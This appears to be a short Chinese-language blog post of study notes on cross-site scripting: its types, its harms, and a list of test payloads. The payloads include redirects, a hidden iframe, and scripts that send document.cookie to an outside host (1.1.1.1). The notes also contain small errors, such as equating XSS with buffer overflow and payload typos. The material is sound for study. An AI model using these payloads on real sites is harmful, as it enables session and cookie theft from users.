网络安全 (五 XSS)

xss(挖掘闭合,绕过)-----跨站脚本-----缓冲区溢出攻击
cookie
后台地址发送给你
通过服务器的漏洞攻击客户端

----在一些交互的地方,利用有没有弹框的方法来检测有没有漏洞

xss危害:
钓鱼,窃取cookie
强制弹出广告页面,刷流量,
网页挂马,提升权限,
传播跨站脚本蠕虫

调用js代码:
标签,属性,元素,样式

alert(1); #输出语句

xss分类:
反射型(非持久)
DOM型
存储型(持久型)

反射型XSS—最常见的,主要用于将恶意的脚本附加到URL地址参数当中-------搜索栏
存储型XSS—存在数据库中,只要访问就会受到攻击----留言板

进行检测:
传个参数?x=asdaas
click

漏洞验证

<body onload=alert('xss')>

<img src='javascript:alert('xss')'>  插入图片

<a href='' onclick=alert('xss')">type</a>

<img src="http://1.1.1.1/a.jpg" onerror=alert('xss')>

<script>window.location="http://www.xxx.com"</script>   进行重定向到一个新的网站 (重定向到百度)

<iframe SRC="http://1.1.1.1/victim" height="0" width="0"></iframe>

<script>new imag().src="http://1.1.1.1/c.php?output="+document.cookie;</script>   显示cookie

<script>document.body.innerHTML="<div style=visibility:visible;><h1>THIS WEBSITE IS UNDER 			ATTACK</h1></div>";</script>

窃取cookie

a.js源码

cd /var/www/html
vim a.js
service apache2 start

var img = new image();
img.src="http://1.1.1.1/cookie.php?cookie="+document.cookie;

工具beef(相当好用的那种)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值